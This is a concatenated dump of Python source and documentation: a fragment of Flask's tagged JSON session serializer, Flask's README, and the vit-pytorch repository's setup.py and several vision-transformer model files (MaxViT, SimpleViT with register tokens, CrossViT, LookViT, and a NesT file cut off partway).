t.Any: return b64decode(value) class TagMarkup(JSONTag): """Serialize anything matching the :class:`~markupsafe.Markup` API by having a ``__html__`` method to the result of that method. Always deserializes to an instance of :class:`~markupsafe.Markup`.""" __slots__ = () key = " m" def check(self, value: t.Any) -> bool: return callable(getattr(value, "__html__", None)) def to_json(self, value: t.Any) -> t.Any: return str(value.__html__()) def to_python(self, value: t.Any) -> t.Any: return Markup(value) class TagUUID(JSONTag): __slots__ = () key = " u" def check(self, value: t.Any) -> bool: return isinstance(value, UUID) def to_json(self, value: t.Any) -> t.Any: return value.hex def to_python(self, value: t.Any) -> t.Any: return UUID(value) class TagDateTime(JSONTag): __slots__ = () key = " d" def check(self, value: t.Any) -> bool: return isinstance(value, datetime) def to_json(self, value: t.Any) -> t.Any: return http_date(value) def to_python(self, value: t.Any) -> t.Any: return parse_date(value) class TaggedJSONSerializer: """Serializer that uses a tag system to compactly represent objects that are not JSON types. Passed as the intermediate serializer to :class:`itsdangerous.Serializer`. The following extra types are supported: * :class:`dict` * :class:`tuple` * :class:`bytes` * :class:`~markupsafe.Markup` * :class:`~uuid.UUID` * :class:`~datetime.datetime` """ __slots__ = ("tags", "order") #: Tag classes to bind when creating the serializer. Other tags can be #: added later using :meth:`~register`. default_tags = [ TagDict, PassDict, TagTuple, PassList, TagBytes, TagMarkup, TagUUID, TagDateTime, ] def __init__(self) -> None: self.tags: dict[str, JSONTag] = {} self.order: list[JSONTag] = [] for cls in self.default_tags: self.register(cls) def register( self, tag_class: type[JSONTag], force: bool = False, index: int | None = None, ) -> None: """Register a new tag with this serializer. :param tag_class: tag class to register. Will be instantiated with this serializer instance. :param force: overwrite an existing tag. If false (default), a :exc:`KeyError` is raised. :param index: index to insert the new tag in the tag order. Useful when the new tag is a special case of an existing tag. If ``None`` (default), the tag is appended to the end of the order. :raise KeyError: if the tag key is already registered and ``force`` is not true. """ tag = tag_class(self) key = tag.key if key: if not force and key in self.tags: raise KeyError(f"Tag '{key}' is already registered.") self.tags[key] = tag if index is None: self.order.append(tag) else: self.order.insert(index, tag) def tag(self, value: t.Any) -> t.Any: """Convert a value to a tagged representation if necessary.""" for tag in self.order: if tag.check(value): return tag.tag(value) return value def untag(self, value: dict[str, t.Any]) -> t.Any: """Convert a tagged representation back to the original type.""" if len(value) != 1: return value key = next(iter(value)) if key not in self.tags: return value return self.tags[key].to_python(value[key]) def _untag_scan(self, value: t.Any) -> t.Any: if isinstance(value, dict): # untag each item recursively value = {k: self._untag_scan(v) for k, v in value.items()} # untag the dict itself value = self.untag(value) elif isinstance(value, list): # untag each item recursively value = [self._untag_scan(item) for item in value] return value def dumps(self, value: t.Any) -> str: """Tag the value and dump it to a compact JSON string.""" return dumps(self.tag(value), separators=(",", ":")) def loads(self, value: str) -> t.Any: """Load data from a JSON string and deserialized any tagged objects.""" return self._untag_scan(loads(value))
# Flask Flask is a lightweight [WSGI][] web application framework. It is designed to make getting started quick and easy, with the ability to scale up to complex applications. It began as a simple wrapper around [Werkzeug][] and [Jinja][], and has become one of the most popular Python web application frameworks. Flask offers suggestions, but doesn't enforce any dependencies or project layout. It is up to the developer to choose the tools and libraries they want to use. There are many extensions provided by the community that make adding new functionality easy. [WSGI]: https://wsgi.readthedocs.io/ [Werkzeug]: https://werkzeug.palletsprojects.com/ [Jinja]: https://jinja.palletsprojects.com/ ## A Simple Example ```python # save this as app.py from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return "Hello, World!" ``` ``` $ flask run * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) ``` ## Donate The Pallets organization develops and supports Flask and the libraries it uses. In order to grow the community of contributors and users, and allow the maintainers to devote more time to the projects, [please donate today][]. [please donate today]: https://palletsprojects.com/donate
vit-pytorch
fcb9501cdd9e056dd040915deb3e0a6378821843
File: setup.py from setuptools import setup, find_packages with open('README.md') as f: long_description = f.read() setup( name = 'vit-pytorch', packages = find_packages(exclude=['examples']), version = '1.7.12', license='MIT', description = 'Vision Transformer (ViT) - Pytorch', long_description=long_description, long_description_content_type = 'text/markdown', author = 'Phil Wang', author_email = '[email protected]', url = 'https://github.com/lucidrains/vit-pytorch', keywords = [ 'artificial intelligence', 'attention mechanism', 'image recognition' ], install_requires=[ 'einops>=0.7.0', 'torch>=1.10', 'torchvision' ], setup_requires=[ 'pytest-runner', ], tests_require=[ 'pytest', 'torch==2.4.0', 'torchvision==0.19.0' ], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.6', ], ) File: vit_pytorch/max_vit.py from functools import partial import torch from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class Residual(nn.Module): def __init__(self, dim, fn): super().__init__() self.fn = fn def forward(self, x): return self.fn(x) + x class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() inner_dim = int(dim * mult) self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, inner_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # MBConv class SqueezeExcitation(nn.Module): def __init__(self, dim, shrinkage_rate = 0.25): super().__init__() hidden_dim = int(dim * shrinkage_rate) self.gate = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(dim, hidden_dim, bias = False), nn.SiLU(), nn.Linear(hidden_dim, dim, bias = False), nn.Sigmoid(), Rearrange('b c -> b c 1 1') ) def forward(self, x): return x * self.gate(x) class MBConvResidual(nn.Module): def __init__(self, fn, dropout = 0.): super().__init__() self.fn = fn self.dropsample = Dropsample(dropout) def forward(self, x): out = self.fn(x) out = self.dropsample(out) return out + x class Dropsample(nn.Module): def __init__(self, prob = 0): super().__init__() self.prob = prob def forward(self, x): device = x.device if self.prob == 0. or (not self.training): return x keep_mask = torch.FloatTensor((x.shape[0], 1, 1, 1), device = device).uniform_() > self.prob return x * keep_mask / (1 - self.prob) def MBConv( dim_in, dim_out, *, downsample, expansion_rate = 4, shrinkage_rate = 0.25, dropout = 0. ): hidden_dim = int(expansion_rate * dim_out) stride = 2 if downsample else 1 net = nn.Sequential( nn.Conv2d(dim_in, hidden_dim, 1), nn.BatchNorm2d(hidden_dim), nn.GELU(), nn.Conv2d(hidden_dim, hidden_dim, 3, stride = stride, padding = 1, groups = hidden_dim), nn.BatchNorm2d(hidden_dim), nn.GELU(), SqueezeExcitation(hidden_dim, shrinkage_rate = shrinkage_rate), nn.Conv2d(hidden_dim, dim_out, 1), nn.BatchNorm2d(dim_out) ) if dim_in == dim_out and not downsample: net = MBConvResidual(net, dropout = dropout) return net # attention related classes class Attention(nn.Module): def __init__( self, dim, dim_head = 32, dropout = 0., window_size = 7 ): super().__init__() assert (dim % dim_head) == 0, 'dimension should be divisible by dimension per head' self.heads = dim // dim_head self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, dim * 3, bias = False) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Linear(dim, dim, bias = False), nn.Dropout(dropout) ) # relative positional bias self.rel_pos_bias = nn.Embedding((2 * window_size - 1) ** 2, self.heads) pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = rearrange(grid, 'i ... -> i 1 ...') - rearrange(grid, 'j ... -> 1 j ...') rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): batch, height, width, window_height, window_width, _, device, h = *x.shape, x.device, self.heads x = self.norm(x) # flatten x = rearrange(x, 'b x y w1 w2 d -> (b x y) (w1 w2) d') # project for queries, keys, values q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) # scale q = q * self.scale # sim sim = einsum('b h i d, b h j d -> b h i j', q, k) # add positional bias bias = self.rel_pos_bias(self.rel_pos_indices) sim = sim + rearrange(bias, 'i j h -> h i j') # attention attn = self.attend(sim) # aggregate out = einsum('b h i j, b h j d -> b h i d', attn, v) # merge heads out = rearrange(out, 'b h (w1 w2) d -> b w1 w2 (h d)', w1 = window_height, w2 = window_width) # combine heads out out = self.to_out(out) return rearrange(out, '(b x y) ... -> b x y ...', x = height, y = width) class MaxViT(nn.Module): def __init__( self, *, num_classes, dim, depth, dim_head = 32, dim_conv_stem = None, window_size = 7, mbconv_expansion_rate = 4, mbconv_shrinkage_rate = 0.25, dropout = 0.1, channels = 3 ): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' # convolutional stem dim_conv_stem = default(dim_conv_stem, dim) self.conv_stem = nn.Sequential( nn.Conv2d(channels, dim_conv_stem, 3, stride = 2, padding = 1), nn.Conv2d(dim_conv_stem, dim_conv_stem, 3, padding = 1) ) # variables num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (dim_conv_stem, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) self.layers = nn.ModuleList([]) # shorthand for window size for efficient block - grid like attention w = window_size # iterate through stages for ind, ((layer_dim_in, layer_dim), layer_depth) in enumerate(zip(dim_pairs, depth)): for stage_ind in range(layer_depth): is_first = stage_ind == 0 stage_dim_in = layer_dim_in if is_first else layer_dim block = nn.Sequential( MBConv( stage_dim_in, layer_dim, downsample = is_first, expansion_rate = mbconv_expansion_rate, shrinkage_rate = mbconv_shrinkage_rate ), Rearrange('b d (x w1) (y w2) -> b x y w1 w2 d', w1 = w, w2 = w), # block-like attention Residual(layer_dim, Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = w)), Residual(layer_dim, FeedForward(dim = layer_dim, dropout = dropout)), Rearrange('b x y w1 w2 d -> b d (x w1) (y w2)'), Rearrange('b d (w1 x) (w2 y) -> b x y w1 w2 d', w1 = w, w2 = w), # grid-like attention Residual(layer_dim, Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = w)), Residual(layer_dim, FeedForward(dim = layer_dim, dropout = dropout)), Rearrange('b x y w1 w2 d -> b d (w1 x) (w2 y)'), ) self.layers.append(block) # mlp head out self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): x = self.conv_stem(x) for stage in self.layers: x = stage(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_with_register_tokens.py """ Vision Transformers Need Registers https://arxiv.org/abs/2309.16588 """ import torch from torch import nn from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, num_register_tokens = 4, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.register_tokens = nn.Parameter(torch.randn(num_register_tokens, dim)) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): batch, device = img.shape[0], img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) r = repeat(self.register_tokens, 'n d -> b n d', b = batch) x, ps = pack([x, r], 'b * d') x = self.transformer(x) x, _ = unpack(x, ps, 'b * d') x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/cross_vit.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d # feedforward class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None, kv_include_self = False): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = default(context, x) if kv_include_self: context = torch.cat((x, context), dim = 1) # cross attention requires CLS token includes itself as key / value qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) # transformer encoder, for small and large patches class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.norm = nn.LayerNorm(dim) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) # projecting CLS tokens, in the case that small and large patch tokens have different dimensions class ProjectInOut(nn.Module): def __init__(self, dim_in, dim_out, fn): super().__init__() self.fn = fn need_projection = dim_in != dim_out self.project_in = nn.Linear(dim_in, dim_out) if need_projection else nn.Identity() self.project_out = nn.Linear(dim_out, dim_in) if need_projection else nn.Identity() def forward(self, x, *args, **kwargs): x = self.project_in(x) x = self.fn(x, *args, **kwargs) x = self.project_out(x) return x # cross attention transformer class CrossTransformer(nn.Module): def __init__(self, sm_dim, lg_dim, depth, heads, dim_head, dropout): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ ProjectInOut(sm_dim, lg_dim, Attention(lg_dim, heads = heads, dim_head = dim_head, dropout = dropout)), ProjectInOut(lg_dim, sm_dim, Attention(sm_dim, heads = heads, dim_head = dim_head, dropout = dropout)) ])) def forward(self, sm_tokens, lg_tokens): (sm_cls, sm_patch_tokens), (lg_cls, lg_patch_tokens) = map(lambda t: (t[:, :1], t[:, 1:]), (sm_tokens, lg_tokens)) for sm_attend_lg, lg_attend_sm in self.layers: sm_cls = sm_attend_lg(sm_cls, context = lg_patch_tokens, kv_include_self = True) + sm_cls lg_cls = lg_attend_sm(lg_cls, context = sm_patch_tokens, kv_include_self = True) + lg_cls sm_tokens = torch.cat((sm_cls, sm_patch_tokens), dim = 1) lg_tokens = torch.cat((lg_cls, lg_patch_tokens), dim = 1) return sm_tokens, lg_tokens # multi-scale encoder class MultiScaleEncoder(nn.Module): def __init__( self, *, depth, sm_dim, lg_dim, sm_enc_params, lg_enc_params, cross_attn_heads, cross_attn_depth, cross_attn_dim_head = 64, dropout = 0. ): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Transformer(dim = sm_dim, dropout = dropout, **sm_enc_params), Transformer(dim = lg_dim, dropout = dropout, **lg_enc_params), CrossTransformer(sm_dim = sm_dim, lg_dim = lg_dim, depth = cross_attn_depth, heads = cross_attn_heads, dim_head = cross_attn_dim_head, dropout = dropout) ])) def forward(self, sm_tokens, lg_tokens): for sm_enc, lg_enc, cross_attend in self.layers: sm_tokens, lg_tokens = sm_enc(sm_tokens), lg_enc(lg_tokens) sm_tokens, lg_tokens = cross_attend(sm_tokens, lg_tokens) return sm_tokens, lg_tokens # patch-based image to token embedder class ImageEmbedder(nn.Module): def __init__( self, *, dim, image_size, patch_size, dropout = 0., channels = 3 ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(dropout) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] return self.dropout(x) # cross ViT class class CrossViT(nn.Module): def __init__( self, *, image_size, num_classes, sm_dim, lg_dim, sm_patch_size = 12, sm_enc_depth = 1, sm_enc_heads = 8, sm_enc_mlp_dim = 2048, sm_enc_dim_head = 64, lg_patch_size = 16, lg_enc_depth = 4, lg_enc_heads = 8, lg_enc_mlp_dim = 2048, lg_enc_dim_head = 64, cross_attn_depth = 2, cross_attn_heads = 8, cross_attn_dim_head = 64, depth = 3, dropout = 0.1, emb_dropout = 0.1, channels = 3 ): super().__init__() self.sm_image_embedder = ImageEmbedder(dim = sm_dim, channels= channels, image_size = image_size, patch_size = sm_patch_size, dropout = emb_dropout) self.lg_image_embedder = ImageEmbedder(dim = lg_dim, channels = channels, image_size = image_size, patch_size = lg_patch_size, dropout = emb_dropout) self.multi_scale_encoder = MultiScaleEncoder( depth = depth, sm_dim = sm_dim, lg_dim = lg_dim, cross_attn_heads = cross_attn_heads, cross_attn_dim_head = cross_attn_dim_head, cross_attn_depth = cross_attn_depth, sm_enc_params = dict( depth = sm_enc_depth, heads = sm_enc_heads, mlp_dim = sm_enc_mlp_dim, dim_head = sm_enc_dim_head ), lg_enc_params = dict( depth = lg_enc_depth, heads = lg_enc_heads, mlp_dim = lg_enc_mlp_dim, dim_head = lg_enc_dim_head ), dropout = dropout ) self.sm_mlp_head = nn.Sequential(nn.LayerNorm(sm_dim), nn.Linear(sm_dim, num_classes)) self.lg_mlp_head = nn.Sequential(nn.LayerNorm(lg_dim), nn.Linear(lg_dim, num_classes)) def forward(self, img): sm_tokens = self.sm_image_embedder(img) lg_tokens = self.lg_image_embedder(img) sm_tokens, lg_tokens = self.multi_scale_encoder(sm_tokens, lg_tokens) sm_cls, lg_cls = map(lambda t: t[:, 0], (sm_tokens, lg_tokens)) sm_logits = self.sm_mlp_head(sm_cls) lg_logits = self.lg_mlp_head(lg_cls) return sm_logits + lg_logits File: vit_pytorch/look_vit.py import torch from torch import nn import torch.nn.functional as F from torch.nn import Module, ModuleList from einops import einsum, rearrange, repeat, reduce from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def divisible_by(num, den): return (num % den) == 0 # simple vit sinusoidal pos emb def posemb_sincos_2d(t, temperature = 10000): h, w, d, device = *t.shape[1:], t.device y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (d % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(d // 4, device = device) / (d // 4 - 1) omega = temperature ** -omega y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pos = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pos.float() # bias-less layernorm with unit offset trick (discovered by Ohad Rubin) class LayerNorm(Module): def __init__(self, dim): super().__init__() self.ln = nn.LayerNorm(dim, elementwise_affine = False) self.gamma = nn.Parameter(torch.zeros(dim)) def forward(self, x): normed = self.ln(x) return normed * (self.gamma + 1) # mlp def MLP(dim, factor = 4, dropout = 0.): hidden_dim = int(dim * factor) return nn.Sequential( LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) # attention class Attention(Module): def __init__( self, dim, heads = 8, dim_head = 64, dropout = 0., cross_attend = False, reuse_attention = False ): super().__init__() inner_dim = dim_head * heads self.scale = dim_head ** -0.5 self.heads = heads self.reuse_attention = reuse_attention self.cross_attend = cross_attend self.split_heads = Rearrange('b n (h d) -> b h n d', h = heads) self.norm = LayerNorm(dim) if not reuse_attention else nn.Identity() self.norm_context = LayerNorm(dim) if cross_attend else nn.Identity() self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) if not reuse_attention else None self.to_k = nn.Linear(dim, inner_dim, bias = False) if not reuse_attention else None self.to_v = nn.Linear(dim, inner_dim, bias = False) self.to_out = nn.Sequential( Rearrange('b h n d -> b n (h d)'), nn.Linear(inner_dim, dim, bias = False), nn.Dropout(dropout) ) def forward( self, x, context = None, return_qk_sim = False, qk_sim = None ): x = self.norm(x) assert not (exists(context) ^ self.cross_attend) if self.cross_attend: context = self.norm_context(context) else: context = x v = self.to_v(context) v = self.split_heads(v) if not self.reuse_attention: qk = (self.to_q(x), self.to_k(context)) q, k = tuple(self.split_heads(t) for t in qk) q = q * self.scale qk_sim = einsum(q, k, 'b h i d, b h j d -> b h i j') else: assert exists(qk_sim), 'qk sim matrix must be passed in for reusing previous attention' attn = self.attend(qk_sim) attn = self.dropout(attn) out = einsum(attn, v, 'b h i j, b h j d -> b h i d') out = self.to_out(out) if not return_qk_sim: return out return out, qk_sim # LookViT class LookViT(Module): def __init__( self, *, dim, image_size, num_classes, depth = 3, patch_size = 16, heads = 8, mlp_factor = 4, dim_head = 64, highres_patch_size = 12, highres_mlp_factor = 4, cross_attn_heads = 8, cross_attn_dim_head = 64, patch_conv_kernel_size = 7, dropout = 0.1, channels = 3 ): super().__init__() assert divisible_by(image_size, highres_patch_size) assert divisible_by(image_size, patch_size) assert patch_size > highres_patch_size, 'patch size of the main vision transformer should be smaller than the highres patch sizes (that does the `lookup`)' assert not divisible_by(patch_conv_kernel_size, 2) self.dim = dim self.image_size = image_size self.patch_size = patch_size kernel_size = patch_conv_kernel_size patch_dim = (highres_patch_size * highres_patch_size) * channels self.to_patches = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (p1 p2 c) h w', p1 = highres_patch_size, p2 = highres_patch_size), nn.Conv2d(patch_dim, dim, kernel_size, padding = kernel_size // 2), Rearrange('b c h w -> b h w c'), LayerNorm(dim), ) # absolute positions num_patches = (image_size // highres_patch_size) ** 2 self.pos_embedding = nn.Parameter(torch.randn(num_patches, dim)) # lookvit blocks layers = ModuleList([]) for _ in range(depth): layers.append(ModuleList([ Attention(dim = dim, dim_head = dim_head, heads = heads, dropout = dropout), MLP(dim = dim, factor = mlp_factor, dropout = dropout), Attention(dim = dim, dim_head = cross_attn_dim_head, heads = cross_attn_heads, dropout = dropout, cross_attend = True), Attention(dim = dim, dim_head = cross_attn_dim_head, heads = cross_attn_heads, dropout = dropout, cross_attend = True, reuse_attention = True), LayerNorm(dim), MLP(dim = dim, factor = highres_mlp_factor, dropout = dropout) ])) self.layers = layers self.norm = LayerNorm(dim) self.highres_norm = LayerNorm(dim) self.to_logits = nn.Linear(dim, num_classes, bias = False) def forward(self, img): assert img.shape[-2:] == (self.image_size, self.image_size) # to patch tokens and positions highres_tokens = self.to_patches(img) size = highres_tokens.shape[-2] pos_emb = posemb_sincos_2d(highres_tokens) highres_tokens = highres_tokens + rearrange(pos_emb, '(h w) d -> h w d', h = size) tokens = F.interpolate( rearrange(highres_tokens, 'b h w d -> b d h w'), img.shape[-1] // self.patch_size, mode = 'bilinear' ) tokens = rearrange(tokens, 'b c h w -> b (h w) c') highres_tokens = rearrange(highres_tokens, 'b h w c -> b (h w) c') # attention and feedforwards for attn, mlp, lookup_cross_attn, highres_attn, highres_norm, highres_mlp in self.layers: # main tokens cross attends (lookup) on the high res tokens lookup_out, qk_sim = lookup_cross_attn(tokens, highres_tokens, return_qk_sim = True) # return attention as they reuse the attention matrix tokens = lookup_out + tokens tokens = attn(tokens) + tokens tokens = mlp(tokens) + tokens # attention-reuse qk_sim = rearrange(qk_sim, 'b h i j -> b h j i') # transpose for reverse cross attention highres_tokens = highres_attn(highres_tokens, tokens, qk_sim = qk_sim) + highres_tokens highres_tokens = highres_norm(highres_tokens) highres_tokens = highres_mlp(highres_tokens) + highres_tokens # to logits tokens = self.norm(tokens) highres_tokens = self.highres_norm(highres_tokens) tokens = reduce(tokens, 'b n d -> b d', 'mean') highres_tokens = reduce(highres_tokens, 'b n d -> b d', 'mean') return self.to_logits(tokens + highres_tokens) # main if __name__ == '__main__': v = LookViT( image_size = 256, num_classes = 1000, dim = 512, depth = 2, heads = 8, dim_head = 64, patch_size = 32, highres_patch_size = 8, highres_mlp_factor = 2, cross_attn_heads = 8, cross_attn_dim_head = 64, dropout = 0.1 ).cuda() img = torch.randn(2, 3, 256, 256).cuda() pred = v(img) assert pred.shape == (2, 1000) File: vit_pytorch/nest.py from functools import partial import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce # helpers def cast_tuple(val, depth): return val if isinstance(val, tuple) else ((val,) * depth) # classes class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mlp_mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mlp_mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mlp_mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dropout = 0.): super().__init__() dim_head = dim // heads inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): b, c, h, w, heads = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = 1) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> b h (x y) d', h = heads), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = h, y = w) return self.to_out(out) def Aggregate(dim, dim_out): return nn.Sequential( nn.Conv2d(dim, dim_out, 3, padding = 1), LayerNorm(dim_out), nn.MaxPool2d(3, stride = 2, padding = 1) ) class Transformer(nn.Module): def __init__(self, dim, seq_len, depth, heads, 